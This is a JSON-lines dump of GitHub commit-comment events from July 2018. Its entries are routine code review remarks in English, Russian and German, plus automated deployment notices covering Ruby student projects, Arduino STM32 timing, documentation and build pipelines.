{"id":"7913921013","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29584338,"position":null,"line":null,"path":null,"commit_id":"c62abde028b873f926f0d98d52b0676e12eac068","created_at":"2018-07-03T17:14:52Z","updated_at":"2018-07-03T17:14:52Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T17:14:52Z"}
{"id":"7913921045","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/docs"},"payload":{"comment":{"id":29584339,"position":17,"line":17,"path":"docs/release/3.4/release-3-4-14.md","commit_id":"a40e099e2b7751c4068cee7cab4abf6836bd6004","created_at":"2018-07-03T17:14:52Z","updated_at":"2018-07-03T17:14:52Z","author_association":"MEMBER","body":"Technically the generated CSRs (and private key) can be used for any CA"}},"created_at":"2018-07-03T17:14:52Z"}
{"id":"7913930104","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29584365,"position":null,"line":null,"path":null,"commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T17:16:37Z","updated_at":"2018-07-03T17:16:37Z","author_association":"NONE","body":"метод `stations_list` у тебя определен дважды\r\nв 87 строке и в 244 строке\r\nодин нужно убрать"}},"created_at":"2018-07-03T17:16:37Z"}
{"id":"7913932064","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29584376,"position":null,"line":null,"path":null,"commit_id":"bd3ba10aafa98318092acb8713d7a3741dd9f268","created_at":"2018-07-03T17:17:02Z","updated_at":"2018-07-03T17:17:02Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-41](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-41-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-03T17:17:02Z"}
{"id":"7913940727","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":29584391,"position":null,"line":null,"path":null,"commit_id":"b22c31f226bcb6f8fb7fd294fb05f5dd8ca74a6e","created_at":"2018-07-03T17:18:45Z","updated_at":"2018-07-03T17:18:45Z","author_association":"MEMBER","body":"This does nothing since this `gene_member_id` is redefined in both `SeqMember` and `GeneMember`. Unless you are manipulating `Member` objects directly ??"}},"created_at":"2018-07-03T17:18:45Z"}
{"id":"7913941506","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29584393,"position":null,"line":null,"path":null,"commit_id":"bc47bfc52f811038ebf6e3a37f94a823eed21608","created_at":"2018-07-03T17:18:54Z","updated_at":"2018-07-03T17:18:54Z","author_association":"NONE","body":"имя файла `rout.rb` должно быть `route.rb`, чтобы совпадать с классом, который описывается в файле\r\n"}},"created_at":"2018-07-03T17:18:54Z"}
{"id":"7913942263","type":"CommitCommentEvent","actor":{"login":"halkeye"},"repo":{"name":"WebReflection/url-search-params"},"payload":{"comment":{"id":29584394,"position":null,"line":null,"path":null,"commit_id":"aa6aa5723b49bbced4ad9d555dfc0afc2da74038","created_at":"2018-07-03T17:19:03Z","updated_at":"2018-07-03T17:19:03Z","author_association":"NONE","body":"Ps, you typoed browser here"}},"created_at":"2018-07-03T17:19:03Z"}
{"id":"7913942854","type":"CommitCommentEvent","actor":{"login":"timersys"},"repo":{"name":"Kluny/facebook-login"},"payload":{"comment":{"id":29584395,"position":null,"line":null,"path":null,"commit_id":"2a7b64bdc7407dff5195dcfada03ddfc7177c151","created_at":"2018-07-03T17:19:10Z","updated_at":"2018-07-03T17:19:10Z","author_association":"NONE","body":"Hey excellent job, I'm checking all the commits. May I ask why reducing timeout ? I found some crappy hosting that 5 seconds was not enough that's why I increased. \r\nMaybe add a filter to keep the option available"}},"created_at":"2018-07-03T17:19:10Z"}
{"id":"7913945674","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29584401,"position":null,"line":null,"path":null,"commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-03T17:19:43Z","updated_at":"2018-07-03T17:19:43Z","author_association":"NONE","body":"метод `stations_list` у тебя определен дважды\r\nв 87 строке и в 244 строке\r\nодин нужно убрать"}},"created_at":"2018-07-03T17:19:43Z"}
{"id":"7913947128","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29584405,"position":null,"line":null,"path":null,"commit_id":"b6e701e9fbd98d29afdc25c9ce09cc9320a94372","created_at":"2018-07-03T17:20:00Z","updated_at":"2018-07-03T17:20:00Z","author_association":"NONE","body":"имя файла `rout.rb` должно быть `route.rb`, чтобы совпадать с классом, который описывается в файле\r\n"}},"created_at":"2018-07-03T17:20:00Z"}
{"id":"7913947626","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"WebReflection/url-search-params"},"payload":{"comment":{"id":29584406,"position":null,"line":null,"path":null,"commit_id":"aa6aa5723b49bbced4ad9d555dfc0afc2da74038","created_at":"2018-07-03T17:20:07Z","updated_at":"2018-07-03T17:20:07Z","author_association":"NONE","body":"I'm also not sure what you mean - the browser field is *supposed* to be used for anything targeting a browser, which includes basically all bundlers."}},"created_at":"2018-07-03T17:20:07Z"}
{"id":"7913948161","type":"CommitCommentEvent","actor":{"login":"silps"},"repo":{"name":"robokoding/STK500"},"payload":{"comment":{"id":29584407,"position":null,"line":null,"path":null,"commit_id":"71096e274ddea21167993823703aec69ff1171d8","created_at":"2018-07-03T17:20:14Z","updated_at":"2018-07-03T17:20:14Z","author_association":"MEMBER","body":"No you do not have to flash any specific program, Arduino uses the stk500 by default. This was also my goal to reprogram any Arduino using an Android app. So I was testing programming the Arduino over a bluetooth connection and I was successful with it. There are always some timing issues and it's kinda difficult always to figure out the problems. I spent several months with this project.\r\n\r\nHope you can find a way to debug the stuff, see what the Arduino gets and see what's missing etc."}},"created_at":"2018-07-03T17:20:14Z"}
{"id":"7913949162","type":"CommitCommentEvent","actor":{"login":"wolfsage"},"repo":{"name":"mmcclimon/Ix"},"payload":{"comment":{"id":29584408,"position":206,"line":377,"path":"t/updates.t","commit_id":"9f8c69623d6dc4d7b12eef2f4c515a6e6939c222","created_at":"2018-07-03T17:20:23Z","updated_at":"2018-07-03T17:20:23Z","author_association":"NONE","body":"Aaaaaaaaaarggggggghhhhhhhh. But that's not quite right. This might be a case where it's better to say \"It is not possible to sync from this state.\" (if we can even detect that!). Or, failing that, everything should come back in created because we don't know what the UI thinks it has? 4-5 isn't possible really, so syncing from it is like \"What the hell?\". \r\n\r\nI don't know."}},"created_at":"2018-07-03T17:20:23Z"}
{"id":"7913951656","type":"CommitCommentEvent","actor":{"login":"justinschoeman"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29584413,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T17:20:53Z","updated_at":"2018-07-03T17:20:53Z","author_association":"NONE","body":"I was chasing a big specifically from this discussion:\r\nhttp://www.stm32duino.com/viewtopic.php?f=28&t=3799\r\n\r\nThe Adafruit_AD1x15 driver has a few longish i2c writes followed by a delay(8).  The hardware produces an output in 7.8ms. But because of the i2c writes, the delay(8) delays less than 7.8ms, and the wrong results are returned.\r\n\r\nThe same sort of issues will apply to all BMP180 drivers, which have to rely on deterministic delays to function correctly.\r\n\r\nAlthough it is a very minor issue, it is a deviation from spec, which causes breakages in user code.  The fix is minor, and there should not be any major issues implementing it?"}},"created_at":"2018-07-03T17:20:53Z"}
{"id":"7913954730","type":"CommitCommentEvent","actor":{"login":"timersys"},"repo":{"name":"Kluny/facebook-login"},"payload":{"comment":{"id":29584417,"position":164,"line":698,"path":"trunk/public/class-facebook-login-public.php","commit_id":"3f02f8c3f8337adc1b451ed430b71623224283b3","created_at":"2018-07-03T17:21:29Z","updated_at":"2018-07-03T17:21:29Z","author_association":"NONE","body":"redirect_to instead of redirect"}},"created_at":"2018-07-03T17:21:29Z"}
{"id":"7913961436","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29584423,"position":null,"line":null,"path":null,"commit_id":"eb3f3d474744a2c83e83e32d5111853fe6b244f8","created_at":"2018-07-03T17:22:47Z","updated_at":"2018-07-03T17:22:47Z","author_association":"MEMBER","body":"Menu behaviors:\r\n\r\n- Defaults to collapsed, if viewport < 801px is set to be visible\r\n- If viewport < 801px the menu is layered above the content, there is a clickable backdrop when open, every sidebar click collapses the menu (and changes routes etc. as necessary, may need to be refactored if we continue to interact with the agenda input in the sidebar, but we haven’t migrated the action meeting yet)\r\n- If viewport > 801px the menu is open and pushes content to a more narrow width"}},"created_at":"2018-07-03T17:22:47Z"}
{"id":"7913962517","type":"CommitCommentEvent","actor":{"login":"nicholasio"},"repo":{"name":"Kluny/facebook-login"},"payload":{"comment":{"id":29584426,"position":null,"line":null,"path":null,"commit_id":"2a7b64bdc7407dff5195dcfada03ddfc7177c151","created_at":"2018-07-03T17:22:59Z","updated_at":"2018-07-03T17:22:59Z","author_association":"COLLABORATOR","body":"@timersys it mostly because VIP Go usually doesn't allow timeouts greater than 5s, however I think we can leave timeout = 30 for non VIP Go hosts, so we could just leave 30s when using wp_remote_get. cc @Kluny "}},"created_at":"2018-07-03T17:22:59Z"}
{"id":"7913965341","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29584432,"position":null,"line":null,"path":null,"commit_id":"f355a9c4f1ca78cd668d8e400d728bc871b69819","created_at":"2018-07-03T17:23:32Z","updated_at":"2018-07-03T17:23:32Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#pr-2](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-03T17:23:32Z"}
{"id":"7913966965","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29584435,"position":null,"line":null,"path":null,"commit_id":"03966d813c0277df5663a4e80fd5e02f9455c284","created_at":"2018-07-03T17:23:52Z","updated_at":"2018-07-03T17:23:52Z","author_association":"MEMBER","body":"@mattkrick what do you think about this pattern for slowly deprecating use of a single `ui` object but having sharable style constants across common UI patterns “Meeting” etc."}},"created_at":"2018-07-03T17:23:52Z"}
{"id":"7913967024","type":"CommitCommentEvent","actor":{"login":"marcel303"},"repo":{"name":"asb2m10/jsusfx"},"payload":{"comment":{"id":29584436,"position":7,"line":2548,"path":"src/WDL/eel2/asm-nseel-x86-msvc.c","commit_id":"f4ec7a059d1b753c4779bd0a5162c0af0b0970fd","created_at":"2018-07-03T17:23:52Z","updated_at":"2018-07-03T17:23:52Z","author_association":"CONTRIBUTOR","body":"Hey, sorry for not coming back to this earlier. I see.. thank you for clearing this up. I think there's a connection with the PHP script and these magic numbers too. #voodoo :-)"}},"created_at":"2018-07-03T17:23:52Z"}
{"id":"7913969538","type":"CommitCommentEvent","actor":{"login":"m7nu3l"},"repo":{"name":"m7nu3l/TinyBCT"},"payload":{"comment":{"id":29584441,"position":null,"line":null,"path":null,"commit_id":"e6544121bc7b0ac612cc934d1bd71e5e8f46761f","created_at":"2018-07-03T17:24:22Z","updated_at":"2018-07-03T17:24:22Z","author_association":"OWNER","body":"poke @rcastano "}},"created_at":"2018-07-03T17:24:22Z"}
{"id":"7913972650","type":"CommitCommentEvent","actor":{"login":"jcw"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29584448,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T17:24:57Z","updated_at":"2018-07-03T17:24:57Z","author_association":"CONTRIBUTOR","body":"Why not simply `delayMicroseconds(7800)` ?"}},"created_at":"2018-07-03T17:24:57Z"}
{"id":"7913992643","type":"CommitCommentEvent","actor":{"login":"EmreTr1"},"repo":{"name":"TuranicTeam/Altay"},"payload":{"comment":{"id":29584488,"position":null,"line":null,"path":null,"commit_id":"a2dcaee5da8b54e2dec6d21025008beabe138246","created_at":"2018-07-03T17:28:55Z","updated_at":"2018-07-03T17:28:55Z","author_association":"MEMBER","body":"Good Job but this update fucking for plugins"}},"created_at":"2018-07-03T17:28:55Z"}
{"id":"7913997326","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29584502,"position":null,"line":null,"path":null,"commit_id":"f2e3176faf4c3c1020c28b2b14b9c0d7e7c6fe3a","created_at":"2018-07-03T17:29:52Z","updated_at":"2018-07-03T17:29:52Z","author_association":"CONTRIBUTOR","body":"Geil! Ich freu mich schon massig, die im Spiel zu finden!"}},"created_at":"2018-07-03T17:29:52Z"}
{"id":"7913998385","type":"CommitCommentEvent","actor":{"login":"sisou"},"repo":{"name":"nimiq/keyguard-next"},"payload":{"comment":{"id":29584504,"position":4,"line":4,"path":"common.js","commit_id":"4f2a685a046f34f6c476f7871801242ac921a536","created_at":"2018-07-03T17:30:05Z","updated_at":"2018-07-03T17:30:05Z","author_association":"CONTRIBUTOR","body":"This should be `RpcServer.create(RequestApiClass, <allowedOrigin>);`"}},"created_at":"2018-07-03T17:30:05Z"}
{"id":"7914000135","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584508,"position":3,"line":3,"path":"desk.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:30:23Z","updated_at":"2018-07-03T17:30:23Z","author_association":"NONE","body":"`desk` - это \"письменный стол\"\r\nвидимо имелась в виду колода: `deck`"}},"created_at":"2018-07-03T17:30:23Z"}
{"id":"7914000814","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":29584509,"position":null,"line":null,"path":null,"commit_id":"1cfe5a37123600273e9a0c954387cef95ba88ca5","created_at":"2018-07-03T17:30:31Z","updated_at":"2018-07-03T17:30:31Z","author_association":"CONTRIBUTOR","body":"In which configuration file is the level configured?"}},"created_at":"2018-07-03T17:30:31Z"}
{"id":"7914002348","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29584513,"position":null,"line":null,"path":null,"commit_id":"fa1f47f1af8d56966de444e541f4e0a8a5417286","created_at":"2018-07-03T17:30:48Z","updated_at":"2018-07-03T17:30:48Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#ci-424](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#ci-424).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-424-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-03T17:30:48Z"}
{"id":"7914004401","type":"CommitCommentEvent","actor":{"login":"SeunghunSunmoonLee"},"repo":{"name":"ares-tech/arestech.io"},"payload":{"comment":{"id":29584519,"position":null,"line":null,"path":null,"commit_id":"687f9bfc8ce002693ff22114b9887b46cd1bc17f","created_at":"2018-07-03T17:31:11Z","updated_at":"2018-07-03T17:31:11Z","author_association":"CONTRIBUTOR","body":"oh my god. my bad.. i'll be more careful next time."}},"created_at":"2018-07-03T17:31:11Z"}
{"id":"7914005255","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29584523,"position":25,"line":343,"path":"Game/Source/input.c","commit_id":"909ae637112d7faeec45edaf09a82770597a96f7","created_at":"2018-07-03T17:31:21Z","updated_at":"2018-07-03T17:31:21Z","author_association":"CONTRIBUTOR","body":"Die Änderung hier ist bullshit ;)\r\nKönnte man auch über die Einstellungsdatei machen, so muss man jetzt (theoretisch) alle Einstellungen verdoppeln, um vorher rauszukommen"}},"created_at":"2018-07-03T17:31:21Z"}
{"id":"7914006278","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29584525,"position":null,"line":null,"path":null,"commit_id":"817520c821ef2fe05e3a897b487309f441757b0c","created_at":"2018-07-03T17:31:34Z","updated_at":"2018-07-03T17:31:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-675](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-675).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-675-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T17:31:34Z"}
{"id":"7914007343","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29584528,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T17:31:46Z","updated_at":"2018-07-03T17:31:46Z","author_association":"NONE","body":"@FauziAkram \r\nI have approved the VLTC but lowered throughput from 333 to 250. This test should not use more bandwidth than a standard LTC. "}},"created_at":"2018-07-03T17:31:46Z"}
{"id":"7914008610","type":"CommitCommentEvent","actor":{"login":"justinschoeman"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29584532,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T17:32:02Z","updated_at":"2018-07-03T17:32:02Z","author_association":"NONE","body":"That would work. So would `delay(9)`. But ideally you would not want end users to be required to hand-edit external libraries to make them work with the stm32 core. Especially when the correct fix is trivial."}},"created_at":"2018-07-03T17:32:02Z"}
{"id":"7914008765","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29584534,"position":null,"line":null,"path":null,"commit_id":"008e948c8118a6b068fa1f0fb5c04606a76c94a1","created_at":"2018-07-03T17:32:05Z","updated_at":"2018-07-03T17:32:05Z","author_association":"MEMBER","body":"right, run buildtree -ca ;)\r\n\r\nLemme me handle fails for sig clashes.\r\nThis occurs, if a package with the same version is built again which came previoulsy from arch, or a rebuild of our own without bump.\r\nThis is why an approximate order helps to avoid it a bit.\r\n"}},"created_at":"2018-07-03T17:32:05Z"}
{"id":"7914009737","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":29584538,"position":null,"line":null,"path":null,"commit_id":"791ebfc0dc7623a6fb71688e35d752e29a5277c6","created_at":"2018-07-03T17:32:17Z","updated_at":"2018-07-03T17:32:17Z","author_association":"MEMBER","body":"Can we discuss this tomorrow ? This commit has changed the structure of `compare_homology_sets` a lot and there isn't much left of the original function"}},"created_at":"2018-07-03T17:32:17Z"}
{"id":"7914012134","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29584543,"position":6,"line":320,"path":"Game/Source/input.c","commit_id":"909ae637112d7faeec45edaf09a82770597a96f7","created_at":"2018-07-03T17:32:46Z","updated_at":"2018-07-03T17:32:46Z","author_association":"CONTRIBUTOR","body":"ich hab ne weile rumprobiert und mein ergebnis war, dass `mouse_force` mit `time_step` multipliziert werden muss, um framerateunabhängigen mouse-input zu haben (getestet mit 24,30,45,60,90,144 und freeflow FPS)"}},"created_at":"2018-07-03T17:32:46Z"}
{"id":"7914013612","type":"CommitCommentEvent","actor":{"login":"stevstrong"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29584548,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T17:32:55Z","updated_at":"2018-07-03T17:32:55Z","author_association":"CONTRIBUTOR","body":"Here the modified code which shows the problem:\r\n\r\n```\r\n// fast io routines so digitalWrite isn't slowing the code\r\n// PC13\r\n#define SET_LED() GPIOC->regs->BSRR = 1 << 13\r\n#define CLR_LED() GPIOC->regs->BSRR = 1 << 13 << 16\r\n\r\nvoid setup() {\r\n  pinMode(LED_BUILTIN,OUTPUT);\r\n  digitalWrite(LED_BUILTIN,0);\r\n}\r\n\r\nvoid loop() {\r\n  SET_LED();\r\n  delay(1);\r\n  CLR_LED();\r\n  delayMicroseconds(500);\r\n}\r\n\r\n```\r\nThe high time is only 400µsec instead of 1ms."}},"created_at":"2018-07-03T17:32:55Z"}
{"id":"7914016405","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584550,"position":17,"line":17,"path":"game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:33:07Z","updated_at":"2018-07-03T17:33:07Z","author_association":"NONE","body":"вот этих строк здесь быть не должно - это уже методы интерфейса\r\nи должны они быть в интерфейсе\r\nа вызываться должны из какого-то класса рантайма... у тебя это видимо класс `Game`"}},"created_at":"2018-07-03T17:33:07Z"}
{"id":"7914020189","type":"CommitCommentEvent","actor":{"login":"MasterQ32"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29584555,"position":25,"line":343,"path":"Game/Source/input.c","commit_id":"909ae637112d7faeec45edaf09a82770597a96f7","created_at":"2018-07-03T17:33:28Z","updated_at":"2018-07-03T17:33:28Z","author_association":"CONTRIBUTOR","body":"Sinnvoller wäre gewesen, in `settings.c` den Default-Wert anzupassen"}},"created_at":"2018-07-03T17:33:28Z"}
{"id":"7914021753","type":"CommitCommentEvent","actor":{"login":"viv-liu"},"repo":{"name":"viv-liu/azure-docs"},"payload":{"comment":{"id":29584559,"position":224,"line":25,"path":"articles/iot-central/howto-export-data.md","commit_id":"b9df9d49c0d68a4fa5eb09c2ca234a8cd8d48d34","created_at":"2018-07-03T17:33:38Z","updated_at":"2018-07-03T17:33:38Z","author_association":"OWNER","body":"yes, but it matches a lot of the messaging that Microsoft uses to describe slower moving data and analysis. Matches wording in ML, PBI, etc."}},"created_at":"2018-07-03T17:33:38Z"}
{"id":"7914027100","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584569,"position":8,"line":236,"path":"src/org/opendatakit/briefcase/reused/UncheckedFiles.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T17:34:21Z","updated_at":"2018-07-03T17:34:21Z","author_association":"NONE","body":"I think this one can join the `UncheckedFiles` club while we work on the `Try`..."}},"created_at":"2018-07-03T17:34:21Z"}
{"id":"7914028071","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584571,"position":8,"line":8,"path":"my_game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:34:29Z","updated_at":"2018-07-03T17:34:29Z","author_association":"NONE","body":"тут надо бы как-то решить ситуацию\r\nлибо класс называй `MyGame`, либо файл переименовывай в `game.rb`, а старый `game.rb` к примеру в `main.rb`"}},"created_at":"2018-07-03T17:34:29Z"}
{"id":"7914029935","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29584574,"position":null,"line":null,"path":null,"commit_id":"008e948c8118a6b068fa1f0fb5c04606a76c94a1","created_at":"2018-07-03T17:34:44Z","updated_at":"2018-07-03T17:34:44Z","author_association":"CONTRIBUTOR","body":"thank you for clarify, udeved!"}},"created_at":"2018-07-03T17:34:44Z"}
{"id":"7914033410","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584580,"position":23,"line":23,"path":"game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:35:21Z","updated_at":"2018-07-03T17:35:21Z","author_association":"NONE","body":"вот эти инстанс-переменные - это инстанс переменные объекта какого класса ?"}},"created_at":"2018-07-03T17:35:21Z"}
{"id":"7914035433","type":"CommitCommentEvent","actor":{"login":"viv-liu"},"repo":{"name":"viv-liu/azure-docs"},"payload":{"comment":{"id":29584585,"position":240,"line":41,"path":"articles/iot-central/howto-export-data.md","commit_id":"b9df9d49c0d68a4fa5eb09c2ca234a8cd8d48d34","created_at":"2018-07-03T17:35:46Z","updated_at":"2018-07-03T17:35:46Z","author_association":"OWNER","body":"This is outdated messaging. Took it out."}},"created_at":"2018-07-03T17:35:46Z"}
{"id":"7914035500","type":"CommitCommentEvent","actor":{"login":"gagustavo"},"repo":{"name":"myhro/openvpn-docker"},"payload":{"comment":{"id":29584586,"position":9,"line":9,"path":"Makefile","commit_id":"8a3fd76a6907b9f53cf7d03add045ee7771aa60c","created_at":"2018-07-03T17:35:47Z","updated_at":"2018-07-03T17:35:47Z","author_association":"NONE","body":"This name is very similar to `getclient`. I thought it was the same Hahaha\r\n\r\n"}},"created_at":"2018-07-03T17:35:47Z"}
{"id":"7914035668","type":"CommitCommentEvent","actor":{"login":"Prasad131"},"repo":{"name":"InstituteWebOps/students_app"},"payload":{"comment":{"id":29584587,"position":null,"line":null,"path":null,"commit_id":"5c865de717c1a0d13f5e7e3b526e01fad5a5c37c","created_at":"2018-07-03T17:35:49Z","updated_at":"2018-07-03T17:35:49Z","author_association":"COLLABORATOR","body":"Delete StudentSearchAdapter if the build shows an error abt it."}},"created_at":"2018-07-03T17:35:49Z"}
{"id":"7914035699","type":"CommitCommentEvent","actor":{"login":"mmcclimon"},"repo":{"name":"mmcclimon/Ix"},"payload":{"comment":{"id":29584588,"position":46,"line":253,"path":"lib/Ix/DBIC/ResultSet.pm","commit_id":"9f8c69623d6dc4d7b12eef2f4c515a6e6939c222","created_at":"2018-07-03T17:35:50Z","updated_at":"2018-07-03T17:35:50Z","author_association":"OWNER","body":"Yeah, I realized that right after I pushed but then I'd already sent the link! Fixed."}},"created_at":"2018-07-03T17:35:50Z"}
{"id":"7914038604","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29584592,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-03T17:36:24Z","updated_at":"2018-07-03T17:36:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T17:36:24Z"}
{"id":"7914041573","type":"CommitCommentEvent","actor":{"login":"jinrenfit"},"repo":{"name":"FittedCloud/awsstats"},"payload":{"comment":{"id":29584596,"position":4,"line":null,"path":"ec2stats.py","commit_id":"a29165f5b0d8ac567b43985ffa493eccbbf139a5","created_at":"2018-07-03T17:37:00Z","updated_at":"2018-07-03T17:37:00Z","author_association":"CONTRIBUTOR","body":"Currently, server does collect instance pricing for gov cloud. Will fix it asap. \n"}},"created_at":"2018-07-03T17:37:00Z"}
{"id":"7914042088","type":"CommitCommentEvent","actor":{"login":"mmcclimon"},"repo":{"name":"mmcclimon/Ix"},"payload":{"comment":{"id":29584597,"position":206,"line":377,"path":"t/updates.t","commit_id":"9f8c69623d6dc4d7b12eef2f4c515a6e6939c222","created_at":"2018-07-03T17:37:07Z","updated_at":"2018-07-03T17:37:07Z","author_association":"OWNER","body":"That's what I've been saying!"}},"created_at":"2018-07-03T17:37:07Z"}
{"id":"7914045653","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/1blackjack"},"payload":{"comment":{"id":29584615,"position":23,"line":23,"path":"game.rb","commit_id":"74b1369f47f09fe1d67c48ed792335998e5f81b3","created_at":"2018-07-03T17:37:51Z","updated_at":"2018-07-03T17:37:51Z","author_association":"NONE","body":"попробуй разобраться с этим вопросом чисто из любопытства ))\r\nа потом убери строки 19 - 23 (как и 16- 17) из этого файла... например в тот же класс `Game`\r\nсоответсвенно здесь останутся только строки 25, 26... правда придется подредакттировать"}},"created_at":"2018-07-03T17:37:51Z"}
